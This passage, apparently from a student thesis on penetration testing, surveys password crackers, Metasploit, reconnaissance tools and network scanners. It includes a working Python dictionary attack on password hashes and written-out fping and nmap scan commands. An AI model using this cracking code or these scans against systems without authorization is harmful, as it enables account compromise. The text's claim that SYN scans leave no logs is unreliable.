Windows systems. It supports HTTP (Basic authentication), HTTP (HTML Form/CGI), POP3, FTP, SMB,
Telnet and other types such as IMAP, NNTP, NetBus, etc. You can also create your own
authentication types, and the tool supports multi-stage authentication engines and can connect to
up to 60 simultaneous targets.

RainbowCrack: a hash cracker that uses a large-scale time-memory trade-off for faster password
cracking than traditional brute force tools. A time-memory trade-off is a computational process in
which plaintext and hash pairs are precomputed with a selected hash algorithm and stored in a
rainbow table. Building the table is very time consuming, but once it is ready it can crack a
password far faster than a brute force tool. Rainbow tables only work against unsalted hashes: a
per-password salt means every salt value would need its own table.

Cain and Abel: a well-known password cracking tool that is capable of handling a variety of
tasks. The most notable thing is that the tool is only available for the Windows platform. It can
work as a sniffer on the network, crack encrypted passwords using dictionary attacks, record VoIP
conversations, run brute force and cryptanalysis attacks, reveal password boxes, uncover cached
passwords, decode scrambled passwords and analyze routing protocols. Cain and Abel does not
exploit any vulnerability or bug; rather it only takes advantage of weaknesses in protocols to
grab passwords. This tool was developed for network administrators, security professionals,
forensics staff and penetration testers.

John the Ripper: another well-known free, open-source password cracking tool for Linux, UNIX and
Mac OS. A Windows version is also available. This tool can detect weak passwords.

THC Hydra: a fast network logon password cracking tool. Compared with other similar tools it is
faster, and it is available for Windows, Linux, FreeBSD, Solaris and OS X. This tool supports
various network protocols. Currently it supports Asterisk, AFP, Cisco AAA, Cisco auth, Cisco
enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY,
HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL,
MySQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP,
Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion,
Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Figure 2.9 shows the interface of THC-Hydra.

Figure 2.9 THC-Hydra interface


Medusa: a password cracking tool similar to THC Hydra. It claims to be a speedy, parallel,
modular login brute forcer. It supports HTTP, FTP, CVS, AFP, IMAP, MS SQL, MySQL, NCP, NNTP, POP3,
PostgreSQL, pcAnywhere, rlogin, SMB, rsh, SMTP, SNMP, SSH, SVN, VNC and Telnet. Host, username and
password can each be given as a single value or as a list while performing the attack. Medusa is a
command-line tool, so you need to learn its commands before using it. The efficiency of the tool
depends on network connectivity; on a local system it can test around 2,000 passwords per minute.
With this tool you can also perform a parallel attack: suppose you want to crack the passwords of
a few e-mail accounts simultaneously, you can specify the username list along with the password
list.

Aircrack-ng: a Wi-Fi password cracking tool that can crack WEP or WPA passwords. It analyzes
captured wireless encrypted packets and then tries to recover the key with its cracking
algorithms. It uses the FMS attack along with other attack techniques for cracking WEP keys, and a
dictionary attack against a captured handshake for WPA. Aircrack-ng is available for Linux and
Windows systems.

Figure 2.10: Aircrack-ng interface for cracking passwords.

Metasploit is an important exploitation tool. However, it is important to understand the
distinction between Metasploit and a vulnerability scanner. In most instances, when we use a
vulnerability scanner, the scanner will only check whether a system is vulnerable. This occurs in
a fairly passive way with little chance of unintentional damage or disruption to the target.
Metasploit and other frameworks are exploitation tools. These tools do not perform tests; they are
used to carry out the actual exploitation of the target. Vulnerability scanners look for and
report potential weaknesses, while Metasploit attempts to actually exploit the systems it targets.
Exploits are the code that takes advantage of a weakness to let the attacker run code (payloads)
on the target system. Payloads are the additional software or functionality that we install on
the target system once the exploit has been successfully executed. Once we have a foothold on a
system, John the Ripper (JtR) can be used to crack passwords and escalate privileges. Escalation
matters because many of the tools we run as penetration or hacking techniques require
administrative-level access in order to install and execute properly. If we can access the
password hashes on a target machine, the chances are good that, with enough time, John the Ripper
can discover the plaintext version of a password. Password cracking consists of two parts:

Locate and download the target system's password hash file.

Use a tool to recover the plaintext password from the hash.

Most systems do not store your password as the plaintext value you enter; rather they store a
hash of the password. A hash is the output of a one-way function, not an encrypted copy: it cannot
be decrypted, so a cracker recovers the password by hashing candidate words and comparing the
results with the stored hash. For example, assume you pick the password qwerty. When you log into
your PC, you type qwerty to access the system; behind the scenes your computer is actually
calculating the hash of what you entered and checking it against the stored hash. The hash of
your password appears to be a random string of characters and numbers.
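To make the hash comparison concrete, this added Python example (not John the Ripper's code and not from the thesis) runs a dictionary attack against the text's own example password, qwerty: once against an unsalted MD5 hash and once against salted SHA-256 records in a constructed user:salt$hash format. The word list and the account lines are constructed; the record format is an assumption for the example, not any real system's password file.

```python
"""Offline dictionary attack on password hashes."""
import hashlib
import os

# Constructed wordlist; real dictionaries run to millions of entries.
WORDLIST = ["letmein", "password", "123456", "qwerty", "dragon", "Winter2014"]


def md5_hash(word):
    """Unsalted MD5, the weakest case: identical passwords give identical hashes."""
    return hashlib.md5(word.encode()).hexdigest()


def salted_sha256(word, salt):
    """Salted SHA-256 in a simple "salt$hash" record format (assumed for the example)."""
    return salt + "$" + hashlib.sha256(salt.encode() + word.encode()).hexdigest()


def crack_md5(target_hash, wordlist):
    """Hash each candidate and compare; return the matching word or None."""
    for word in wordlist:
        if md5_hash(word) == target_hash:
            return word
    return None


def crack_salted_sha256(record, wordlist):
    """Same idea for a "salt$hash" record: the salt is public, only the word is unknown."""
    salt, _, digest = record.partition("$")
    for word in wordlist:
        if hashlib.sha256(salt.encode() + word.encode()).hexdigest() == digest:
            return word
    return None


def crack_shadow_lines(lines, wordlist):
    """Walk 'user:salt$hash' lines (constructed format) and return {user: password} for hits."""
    found = {}
    for line in lines:
        user, _, record = line.strip().partition(":")
        word = crack_salted_sha256(record, wordlist)
        if word is not None:
            found[user] = word
    return found


def demo():
    """Crack the text's example password both ways; returns (md5_hit, salted_hits)."""
    md5_hit = crack_md5(md5_hash("qwerty"), WORDLIST)
    salt = os.urandom(4).hex()  # per-account random salt, as a real system would store
    lines = [
        "kmensah:" + salted_sha256("qwerty", salt),
        "aowusu:" + salted_sha256("correct horse battery staple", salt),  # not in the wordlist
    ]
    return md5_hit, crack_shadow_lines(lines, WORDLIST)


if __name__ == "__main__":
    print(demo())
```

The salt does not stop a dictionary attack against one account; it stops precomputation and forces every account to be attacked separately, which is why a slow, salted hash (bcrypt, scrypt, PBKDF2) rather than a fast digest is the defence.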
The exploitation phase is the attacking phase and this is the phase that separates the boys from
the men. This is at the heart of any hacker or penetration tester, the most interesting and
challenging phase. After determining the vulnerabilities that exist in the systems, the next stage is
to identify suitable targets for a penetration attempt.
An attack phase can be further categorized into the following:

Exploitation phase

Privilege Escalation phase


The exploitation phase can be dangerous if not executed properly. There is a chance that running
an exploit brings a production system down. All exploits need to be thoroughly tested in a lab
environment prior to actual use. There are good exploitation frameworks available that aid a
hacker or penetration tester in developing exploits and executing them in a systematic manner. A
few good commercial as well as open-source exploitation frameworks are:

The Metasploit project

Core Security Technologys Impact

Immunitys CANVAS

A penetration tester or hacker can make use of the full potential of such frameworks, rather than
using them merely for running exploits. These frameworks can save a lot of time in writing custom
exploits.

2.4.1 Privilege Escalation:
Sometimes a successful exploit does not lead to root access. For example, for a particular
vulnerability, the hacker or pen tester might acquire only user-level access. At that point,
further analysis of the target system must be carried out to gain more information that could
lead to administrative privileges, e.g. local vulnerabilities. A penetration tester or hacker
might need to install additional software to obtain a higher level of privilege. This process is
called privilege escalation.
A hacker or penetration tester also considers pivoting through targeted systems after successful
exploitation. Pivoting is a process in which a hacker uses the compromised (target) system to
attack other systems in the target network.

2.5. Conclusion:
My literature review gives a general view of hacking and penetration testing. I realized that the
books and articles reviewed give accurate information to readers, who could sit comfortably at
home and compromise a targeted system. The strength of the review is the broad knowledge it gives
of all the techniques applied in hacking; the most important knowledge acquired is that
organizations need to train their staff, especially about reconnaissance, because this is the key
technique applied in hacking even after sophisticated preventive equipment has been deployed.
Moreover, different tools are used in penetration testing and hacking, so users have to be
trained specifically in the tools to be used. Linux has distributions with built-in hacking and
penetration testing tools, such as BackTrack 5 R3, while Ubuntu has Blackbuntu, which has numerous
hacking and penetration testing tools built in.
My literature review research question helped to define the most important and efficient general
tools used to perform penetration testing or hacking, and narrowed it down to training the staff
of an organization to be knowledgeable about reconnaissance and social engineering.
Reconnaissance and social engineering are the most crucial techniques hackers use to begin their
attacks.
Limitations of penetration testing: Penetration testing cannot be expected to identify all
possible security weaknesses, nor does it guarantee that a system is 100% secure. New technologies
and hacking methods can create new exposures not anticipated during the penetration test. Thus it
is certainly possible that hacking incidents occur after a penetration test, because it is
impossible to have full protection for an organization's security, only good protection.


CHAPTER THREE

METHODOLOGY
3.0 INTRODUCTION
For effective and successful penetration testing, information gathering is a prime aspect and
must be given the utmost importance by security researchers. An attacker will attempt to gather as
much information about the target as possible before executing an attack. This enables the
attack to be more refined and efficient than if it were carried out without much information
about the target.
Penetration testing is a more narrowly focused term; it deals with the process of finding flaws in
a target environment with the goal of penetrating its systems and taking control of them. Penetration
testing, as the name implies, is focused on penetrating the target organization's defenses,
compromising systems and getting access to information.
Ethical hacking is an expansive term encompassing all hacking and computer attack
techniques used to find security flaws with the permission of the target owner and with the goal of
improving the target's security, while penetration testing is more focused on the process of
finding vulnerabilities in a target network environment or its systems.
When it comes to advanced hacking and penetration testing methodologies, you can basically
narrow the field down to three. These are:
1. Open Source Security Testing Methodology Manual (OSSTMM): a series of standard tests
designed to deliver results as verified facts that provide actionable information in order
to strengthen security operations.
2. Penetration Testing Execution Standard (PTES): a standard for penetration test execution along
with technical guidance.
3. National Institute of Standards and Technology guide to security testing and assessment
(NIST 800-115): a guide for conducting pen testing and security assessments. It contains
guidance on techniques and methodology when performing an information security
assessment.


Actually research methodology is basically a systematic way to solve a problem however,


National Institute of Standards and Technology 800-115 (NIST 800-115) is a guide for
conducting technical security assessments. It contains guidance on the techniques and methods that
an assessor should use when performing an information security assessment, and it provides more
flexibility during penetration testing.
The four phases of the methodology to be discussed are: information gathering, scanning,
vulnerability analysis, the attack phase (which comprises vulnerability exploitation and privilege
escalation), and evading defenses and erasing tracks.
The methodology used is based on Kali Linux, which integrates certain high-level
tools, following the NIST 800-115 methodology.
The combination of penetration testing and hacking can be broken down into a series of steps or
phases. When put together, these steps form a comprehensive methodology. The use of an
organized approach is important because it not only keeps the penetration tester focused and
moving forward but also allows the results or output from each step to be used in the ensuing
steps.
This standard addresses and covers network penetration testing methodologies at a high level.
These documents focus on the testing framework, information on recommended security tools to use,
and rules of engagement.
The use of a methodology allows you to break down a complex process into a series of smaller,
more manageable tasks. Understanding and following a methodology is an important step in
mastering the basics of hacking. This methodology usually contains four major phases, which are
made up of many sub-headings.


Figure 3.1 NIST 800-115 Methodology

3.1 Information gathering:


The most important event in black box hacking is information gathering or reconnaissance, which
is the method of arming a hacker for the task before him/her. The information gathering phases
are social engineering and passive and active reconnaissance, which were reviewed in chapter two.
This chapter deals with the tools that are used to accomplish information gathering, and
some of the best tools are:

3.1.1. Active reconnaissance tools:


Maltego is an information gathering tool which offers broadly two types of reconnaissance
options, namely infrastructural and personal. Infrastructural reconnaissance deals with the
domain, covering DNS information such as name servers, mail exchangers, zone transfer tables,
DNS-to-IP mapping, and related information. Personal reconnaissance, on the other hand, includes
personal information such as email addresses, phone numbers, social networking profiles and mutual
friend connections.
Maltego uses seed servers, sending client data in XML format over a secure HTTPS
connection. Once processed on the server side, the requested results are returned to the Maltego
client. Gathering all publicly available information using search engines and manual
techniques is cumbersome and time consuming; Maltego largely automates the information
gathering process, thus saving a lot of time for the attacker. Carrying out personal
reconnaissance, we can enumerate various kinds of information from the name provided to us.
These include email addresses, URLs, social network profiles of a person and mutual
connections between two people. This information can be effectively used in a social engineering
attack either to pawn the victim (a pawn being a person who does not have any real power but is used by others to
achieve something) or to gather even more information needed for the attack. Suppose
the attacker obtains the name of a person; mining of data related to the name would start with
targeting the person's email ID. Maltego offers an email-ID transform using search engines, as
explained in the screenshot shown in figure 3.2.

Figure 3.2
As is evident from Figure 3.2, the search engine queries return a large number of email
addresses.

TheHarvester is a tool to gather emails, subdomains, hosts, employee names, open ports and
banners from different public sources like search engines. This tool is intended to help
penetration testers in the early stages of a project; it is a really simple tool but very effective, and the
sources supported are:

Google - emails, subdomains/hostnames

Google profiles - employee names

Bing servers - emails, subdomains/hostnames, virtual hosts

PGP servers - emails, subdomains/hostnames

LinkedIn - employee names

Exalead - emails, subdomains/hostnames

Creepy is a geo-location tool that helps social engineers perform successful information
gathering. After installation is complete, it gives you a nice GUI interface, shown in the figure below.

Figure 3.3 Creepy tool interface

After inputting the target information and pressing the enter key, you will obtain information such as
that shown in the figure below.


Figure 3.4 showing the target information via geo-location

Dmitry is also an information gathering tool, mostly used on the Kali Linux operating system. Dmitry
has the ability to gather as much information as possible about a host. Its base functionality is able to gather
possible subdomains, email addresses, uptime information, TCP port scans, whois lookups, and more. This
information is gathered with the following methods:

Perform an Internet number whois lookup

Retrieve possible uptime data, system and server data

Perform a subdomain search on a target host

Perform an email address search on a target host

Perform a TCP port scan on the target host

The dmitry -i command is used to perform a whois lookup of the IP address of a host on the Kali Linux
operating system. The illustrative diagram shows the information returned by a dmitry -i command.


Figure 3.5

When you open a terminal, type dmitry and hit enter, it gives you details of the other
sub-commands. The diagram below shows the sub-command details after typing dmitry at
the command line.

Figure 3.6 shows Dmitry sub-commands details

Jigsaw is a Ruby script-based email enumeration tool that accesses the Jigsaw business
directory. It generates email addresses in one of four popular naming conventions from
information available in the database. The Jigsaw directory, meanwhile, is crowd-sourced;
more than 27 million company profiles are in the directory, which is maintained
by more than one million users.
It is a rich hunting ground for cybercriminals and an important tool for pen-testers and
enterprise security teams assessing the awareness of employees of the dangers of email-based
spam and phishing campaigns. The Jigsaw tool is intuitive. A user simply enters a
search argument such as the target company name, and the tool returns all the companies
it has knowledge of with that name, plus the number of employees listed and the
company's Jigsaw directory ID. Knowing the ID, an attacker can get much
more granular and find, for example, employee names per department, based upon what is
available in the directory. The attacker then supplies the tool with the domain name of the
company, and the Jigsaw tool generates a list of possible email addresses.
One thing the directory does not have is the employees' email addresses; what Jigsaw does
is generate email addresses for you. The way it does that is by using four common
formats that companies use as logins and attaching them to the supplied domain name.
Since an attacker may not know the target company's particular email convention, the
Jigsaw tool will generate a list of email addresses using first initial plus last name,
first name dot last name, first name plus first initial of the last name, and last name plus first initial
of the first name, each appended to the domain name supplied. All information is displayed to the
attacker, who can save it to a comma-separated value (CSV) file (which stores tabular data as
numbers and plain text).
Royce Davis, one of the developers of Jigsaw, said that organizations need to think hard
about the information they share online and in other forums.
In the case of the Jigsaw database, I do not believe companies are intentionally providing their
information. I believe the records are harvested from business cards which get handed out like
candy at various conferences and public gatherings. An attacker doesn't need to necessarily
obtain a user's email address. Simply obtaining their first and last name is often enough to craft a
valid email address. For this reason I would recommend that companies become more creative
with their username conventions. For example, the first and last initial combined with a unique
identifier could look like dg9810@example.com; this would be more difficult to guess than
the more traditional firstname.lastname@example.com.

Metagoofil is an information gathering tool designed for extracting the metadata of public
documents (pdf, doc, xls, ppt, docx, pptx, xlsx) belonging to a target company. The tool will
perform a search in Google to identify and download the documents to local disk and then
extract the metadata with different libraries like Hachoir, PdfMiner and others. The information
which can be found using metadata includes usernames, paths, MAC addresses, software, operating
systems, etc. This information can be used later on to help in the penetration testing phase.


Figure 3.7 MetaGooFiL

MetaGooFiL is an information gathering tool; to be more exact, it is a metadata extraction tool
written by the same people who wrote theHarvester. Metadata is often defined as data
about data: when you create a document like a Microsoft Word file or a PowerPoint presentation,
additional data is created and stored within your file. This data often includes various pieces of
information that describe the document, including the file name, its size, even the owner or the
person who created that file, and the location and path where it was first saved. This
process occurs automatically without any input from the user.
The ability of an attacker to obtain this information may present some great insight into the
target organization, including usernames, system names, file shares, and other details.
MetaGooFil is a tool that scours the internet looking for documents that belong to your
target. After finding these documents, it downloads them and then attempts to extract the
useful metadata.
MetaGooFil is built into BackTrack 5 and can be found in the BackTrack all-programs menu, e.g.
cd /pentest/enumeration/google/metagoofil. After navigating to the directory, it is a good idea to
create a files folder, so that all the data you download and collect is stored there; this keeps the
original directory clean. You can create the new folder by entering $ mkdir files.
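As an added illustration (not MetaGooFiL's code and not the thesis author's), the Python below parses the /Info dictionary of a constructed minimal PDF, flags the author, path and version fields that a metadata harvester would collect, and blanks them in place so a document can be checked and scrubbed before publication. The sample document and every field value in it are assumptions.

```python
import re
from typing import Dict, List

# Constructed sample document (not a real file): a minimal PDF whose /Info
# dictionary carries the kind of fields a metadata harvester collects. The
# original save path is placed in /Subject purely for illustration.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
3 0 obj
<< /Title (Q3 Network Diagram)
   /Author (jdoe)
   /Creator (Microsoft Word 2010)
   /Producer (Acrobat Distiller 9.0)
   /Subject (C:\\\\Users\\\\jdoe\\\\Documents\\\\netdiag.docx) >>
endobj
trailer
<< /Root 1 0 R /Info 3 0 R >>
%%EOF
"""

INFO_REF_RE = re.compile(rb"/Info\s+(\d+)\s+\d+\s+R")
# One literal-string entry inside a dictionary: /Key (value), honouring \-escapes.
STRING_FIELD_RE = re.compile(rb"/(\w+)\s*\(((?:[^()\\]|\\.)*)\)")
# Markers of a local or UNC path, and of a software version number.
PATH_RE = re.compile(r"(?:[A-Za-z]:\\|^\\\\|/home/|/Users/)")
VERSION_RE = re.compile(r"\d+(?:\.\d+)*")


def _info_object_re(obj_num: bytes) -> "re.Pattern[bytes]":
    # Matches "<n> <gen> obj << ... >> endobj" for the Info object number.
    return re.compile(rb"(?<!\d)" + obj_num + rb"\s+\d+\s+obj\s*<<(.*?)>>\s*endobj", re.S)


def _unescape(raw: bytes) -> str:
    # Resolve the PDF literal-string escapes that matter here: \\ \( \)
    return re.sub(rb"\\([()\\])", rb"\1", raw).decode("latin-1")


def extract_info_dict(pdf: bytes) -> Dict[str, str]:
    """Return the string-valued entries of the document's /Info dictionary."""
    ref = INFO_REF_RE.search(pdf)
    if not ref:
        return {}
    body = _info_object_re(ref.group(1)).search(pdf)
    if not body:
        return {}
    return {k.decode("ascii"): _unescape(v) for k, v in STRING_FIELD_RE.findall(body.group(1))}


def find_leaks(info: Dict[str, str]) -> List[str]:
    """Flag entries that reveal a username, a local path or a software version."""
    findings = []
    for key, value in info.items():
        if key == "Author" and value.strip():
            findings.append(f"username: {key}={value!r}")
        if PATH_RE.search(value):
            findings.append(f"local path: {key}={value!r}")
        if key in ("Creator", "Producer") and VERSION_RE.search(value):
            findings.append(f"software version: {key}={value!r}")
    return findings


def blank_info_strings(pdf: bytes) -> bytes:
    """Overwrite every literal string in the /Info object with spaces of equal
    length, so byte offsets (and therefore an xref table) stay valid."""
    ref = INFO_REF_RE.search(pdf)
    if not ref:
        return pdf
    body = _info_object_re(ref.group(1)).search(pdf)
    if not body:
        return pdf
    start, end = body.span(1)

    def blank(m: "re.Match[bytes]") -> bytes:
        value_len = len(m.group(2))
        head = m.group(0)[: len(m.group(0)) - value_len - 1]  # up to and including "("
        return head + b" " * value_len + b")"

    return pdf[:start] + STRING_FIELD_RE.sub(blank, pdf[start:end]) + pdf[end:]


if __name__ == "__main__":
    for finding in find_leaks(extract_info_dict(SAMPLE_PDF)):
        print(finding)
    print("after scrubbing:", extract_info_dict(blank_info_strings(SAMPLE_PDF)))
```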

3.2. Passive Reconnaissance Techniques


Reconnaissance can be divided into at least two categories, active and passive. Active
reconnaissance requires that you interact with the target computer system to gain information
about it. Although this can be very useful and accurate, it risks detection: while you are doing reconnaissance
on a system, the system admin may choose to block your IP address, and you will leave a trail to
your subsequent activity.
If possible, we would prefer to gather the essential information without ever interacting with the
system, thus leaving no trail to track back to us. That's what passive reconnaissance is all about.
Although there are a number of ways to conduct passive reconnaissance, one of the best ways is
to use a website like Netcraft.
Step 1: Navigate a Browser to Netcraft
When you navigate to the Netcraft website, you will see a webpage that looks like this:

Figure 3.8

Netcraft is a website that tracks virtually every website on the planet. From this data, they are
able to calculate market share for web servers, uptime, etc., becoming one of the leading
authorities for this type of information. They also offer some security services such as an anti-phishing extension and phishing alerts.
Another service that Netcraft offers is data about nearly every website. This data can be
extremely valuable to the hacker. Notice on the right side of the webpage the area that asks
"What's that site running?"

Step 2: Search a Domain

As we can see in the screenshot below, we simply typed in a domain name and Netcraft.com
returned the results for the domain. Notice that in this case, it returns two sites.

Figure 3.9

Step 3: Open the Site Report


Now we can open the site report and get some critical information about this site. We can see at the top
of this report such information as site rank, primary language, IP address and nameserver.

Figure 3.10
If we scroll down a bit, we can get some excellent information that would be useful to a potential
attacker.


Figure 3.11
We can see under the heading "Hosting History" the netblock owner, IP address(es), operating
system, web server, and when the server was last changed. All of this can be useful to the hacker,
including the date last changed. This date generally represents the date the system was last
rebooted or updated.
Step 4: Site Technology
When we scroll down a bit further, we come to a section titled "Site Technology". Here we get
a rundown of the technology the site is running.


Figure 3.12

This listing provides us with information on what technologies the site is running, and from here
the hacker can seek out vulnerabilities in these named technologies. This is a boon for hackers as
they don't have to guess what technologies are behind the website. As every hack is specific to a
technology, knowing what technologies they are running makes it easier for the hacker to find
the appropriate hack.

3.3. SCANNING:
Scanning is a technique used to examine a network to discover flaws such as open
application ports, operating system versions, software loopholes, IP addresses and many more.

3.3.1 Network discovery information tools are:


Fierce.pl is a very lightweight scanner, written by RSnake in Perl, that helps you locate IP space
and hostnames for a specified target domain name. It provides different techniques to gather
information about your victim. This tool will help you with the first step of a pen test:
reconnaissance.
The idea is to gather as many interesting details as possible about your target before starting the
attack. Fierce is used for DNS enumeration and has been included in the BackTrack and Kali Linux
distributions. It is a great tool for discovering non-contiguous IP address space for a certain company, and
you can try a DNS zone transfer, DNS brute-force, and reverse lookups.
Using this example, we can find NS and zone transfer information about a target domain. In this
figure we are getting a successful zone transfer.

Figure 3.13 Fierce zone transfer information

Fping is a program like ping which uses Internet Control Message Protocol echo
requests to determine if a target host is responding. Fping differs from ping in that you can
specify any number of targets on the command line, or specify a file containing the list of
targets to ping. Instead of sending to one target until it times out or replies, fping will
send out a ping packet and move on to the next target in a round-robin fashion. Unlike
ping, fping is meant to be used in scripts, so its output is designed to be easy to parse.
Using Ubuntu, which has fping, you can for example do a network scan that sends one
ping packet per IP by typing $ fping -a -r 0 -g 172.31.0.0/24


Fping has many options, as follows:

-a: Show systems that are alive

-A: Display targets by address rather than DNS name

-b n: Number of bytes of ping data to send

-B n: In the default mode, fping sends several requests to a target before giving up, waiting longer for a
reply on each successive request. This parameter is the value by which the wait time is multiplied
on each successive request. It must be entered as a floating-point number (x.y). The default is 1.5

-c: Number of request packets to send to each target. In this mode, a line is displayed for each
received response (this can be suppressed with -q or -Q). Also, statistics about responses for each
target are displayed when all requests have been sent (or interrupted)

-C: Similar to -c, but per-target statistics are displayed in a format designed for automated
response-time statistics gathering. Example: $ fping -C 5 -q hostname

-d: Use DNS to look up the address of the returned ping packet. This allows you to give fping a list of IP
addresses as input and print hostnames in the output

-e: Show elapsed (round-trip) time of packets

-f: Read a list of targets from a file. This option can only be used by the root user. Regular users
should pipe in the file via stdin: $ fping < target_file

-g: Generate a target list from a supplied IP network, or a starting and ending IP address. Specify
the netmask or start/end in the targets portion of the command line.

-h: Print usage message

-i n: The minimum amount of time (in milliseconds) between sending a ping packet to any target
(default is 25)

-l: Loop sending packets to each target indefinitely. Can be interrupted with Ctrl-C; statistics about
responses for each target are then displayed

-m: Send pings to each of the target host's multiple interfaces

-n: Same as -d

-p: In looping or counting modes (-l, -c, or -C), this parameter sets the time in milliseconds that
fping waits between successive packets to an individual target. Default is 1000.

-q: Quiet. Don't show per-target results, just set final status

-Q n: Like -q, but show summary results every n seconds

-r n: Retry limit (default 3). This is the number of times an attempt at pinging a target will be made, not
including the first try.

-s: Print cumulative statistics upon exit

-t n: Initial target timeout in milliseconds (default 500). In the default mode, this is the amount of
time that fping waits for a response to its first request. Successive timeouts are multiplied by the
backoff factor

-u: Show targets that are unreachable

-v: Print fping version information

DNSDICT6 is an information gathering tool provided with BackTrack. This tool is used to find all the
sub-domains of a website or web server. The most advanced use of dnsdict6 is to enumerate all IPv4 and
IPv6 addresses and extract dumps of sub-domains and IP information; this tool is quite
powerful because it also extracts those sub-domains which are restricted or even invisible to users.
There are certain parameters that we can use with dnsdict6:
1. -d is used to display information on name servers and MX records
2. -4 is used to dump IPv4 addresses
3. There are four types of dictionary already built into this tool: -s(mall=50), -m(edium=796) (default), -l(arge=1416), or -x(treme=3211).
4. -t is used to specify the number of threads

3.3.2: Network port scanning and service identification tools are as follows:

dnmap is a framework to distribute nmap scans among several clients. It reads an already created
file with nmap commands and sends those commands to each client connected to it.
The framework uses a client/server architecture. The server knows what to do and the client does it,
and all the logic and statistics are managed in the server. Nmap output is stored on both server and
client.
Usually you would want this if you have to scan a large group of hosts and you have several different
internet connections.
Features of the dnmap server are the following:

If the server goes down, clients continue trying to connect until the server gets back online

If the server goes down, when you put it up again it will send commands starting from the last
command given before the shutdown. You do not need to remember where it was.

You can add new commands to the original file without having to stop the server. The server
will read them automatically.

If some client goes down, the server will remember which command it was executing and it
will re-schedule it for later.

It will store every detail of the operations in a log file

It shows real-time statistics about the operation of each client, including:
Number of commands executed
Last time seen
Version of the client
Whether the client is being run as root or not
It calculates the amount of commands executed per minute
The historic average of the commands executed per minute
The status of the client (Online, Offline, Executing or Storing)

You can choose which port to use. The default port is 46001

Only the online clients are shown in the running statistics.

Features of the dnmap client are as follows:

If the server goes down, it keeps connecting to it until it gets up again

Strips strange characters from the command sent by the server. This tries to avoid a command injection
vulnerability

It only executes the nmap command. It deletes the command sent by the server and replaces it with
the known and trusted nmap binary on the system.

You can select an alias for your user

You can change which port the client connects to.

If the command sent by the server does not have a -oA option, the client adds it anyway to the
command, so it will always have a local copy of the output.

If the server sends a --min-rate parameter, it is stripped out.

You can control the nmap scanning rate regardless of the server's sent parameters

Tells the server if you are root or not, so it can change the nmap commands accordingly.
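The client-side safeguards listed above (stripping suspicious characters, running only the trusted nmap binary, dropping --min-rate, forcing -oA), reimplemented in Python as an added example; this is not dnmap's own code, and the trusted binary path and the local rate ceiling are assumed values.

```python
from typing import List

# Assumptions for illustration only (not dnmap's code): the client knows the
# path of its trusted nmap binary and enforces its own packet-rate ceiling.
TRUSTED_NMAP = "/usr/bin/nmap"
LOCAL_MAX_RATE = 100
# Characters a legitimate nmap command line needs. Anything else (; | & $ ` < >
# quotes, parentheses, backslashes) is rejected outright rather than escaped.
ALLOWED_CHARS = frozenset(
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_./,:=* "
)
RATE_FLAGS = ("--min-rate", "--max-rate")


class RejectedCommand(ValueError):
    """Raised when a server-supplied command fails validation."""


def sanitize_server_command(raw: str, output_stem: str) -> List[str]:
    """Turn a command line received from the server into an argv list that is
    safe to hand to subprocess without a shell."""
    bad = sorted({c for c in raw if c not in ALLOWED_CHARS})
    if bad:
        raise RejectedCommand(f"disallowed characters: {bad}")
    argv = raw.split()
    if not argv or argv[0].rsplit("/", 1)[-1] != "nmap":
        raise RejectedCommand("only nmap commands are accepted")
    # Never run whatever path the server named; substitute the trusted binary.
    cleaned = [TRUSTED_NMAP]
    skip_value = False
    for arg in argv[1:]:
        if skip_value:                 # value belonging to a stripped rate flag
            skip_value = False
            continue
        if arg in RATE_FLAGS:          # "--min-rate 500" form
            skip_value = True
            continue
        if arg.startswith(tuple(f + "=" for f in RATE_FLAGS)):  # "--min-rate=500" form
            continue
        cleaned.append(arg)
    # The client's own rate ceiling applies regardless of what the server asked for.
    cleaned += ["--max-rate", str(LOCAL_MAX_RATE)]
    # Always keep a local copy of the output, as the client does with -oA.
    if "-oA" not in cleaned:
        cleaned += ["-oA", output_stem]
    return cleaned


def is_rejected(raw: str) -> bool:
    """True if the validator refuses the command (handy for policy checks)."""
    try:
        sanitize_server_command(raw, "probe")
    except RejectedCommand:
        return True
    return False


if __name__ == "__main__":
    print(sanitize_server_command("nmap -sS --min-rate 500 -p 22,80 10.0.0.0/24", "scan01"))
    print(is_rejected("nmap 10.0.0.1; id"))   # semicolon is not allowed
```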
As dnmap is integrated in Kali Linux, first of all start the dnmap server by the following steps:
Applications > Kali Linux > Information Gathering > Live Host Identification > dnmap-server

Figure 3.14 steps to open dnmap


After the terminal has been opened, type dnmap-server and hit the enter key, which gives you the
display shown in figure 3.14.

Figure 3.15 information of dnmap command on the terminal


As you can see in figure 3.6 underneath, the server requires a file containing our Nmap
commands to run

Figure 3.16 show dnmap server command running

Nmap: Network Mapper (Nmap) is a network scanning and host detection tool that is very
useful during several steps of penetration testing and hacking. Nmap is not limited to merely
gathering information and enumeration; it is also a powerful utility that can be used as a
vulnerability detector or a security scanner. Nmap is a multipurpose tool and it can be run on
many different operating systems including Windows, Linux, BSD, and Mac. Nmap is a very
powerful utility that can be used to:

Detect the live hosts on the network (host discovery)

Detect the open ports on the host (port discovery and enumeration)

Detect the software and its version on the respective port (service discovery)

Detect the operating system, hardware address, and the software version

Detect vulnerabilities and security holes (Nmap scripts)

There are many scanning techniques available in Nmap, including the TCP connect scanning
method; these are the most popular scanning techniques:


TCP SYN Scan (-sS): It is a basic scan and it is also called half-open scanning because this technique
allows Nmap to get information from the remote hosts without completing the TCP handshake process.
Nmap sends SYN packets to the destination, but it does not create any sessions. As a result the target
computer can't create any log of the interaction because no session was initiated, making this feature an
advantage of the TCP SYN scan.
If no scan type is mentioned on the command line, then a TCP SYN scan is used by default, but it
requires root/administrator privilege. Example (on the Windows platform): # nmap -sS 192.168.1.1

TCP connect() scan (-sT): This is the default scanning technique used if and only if the SYN scan is not
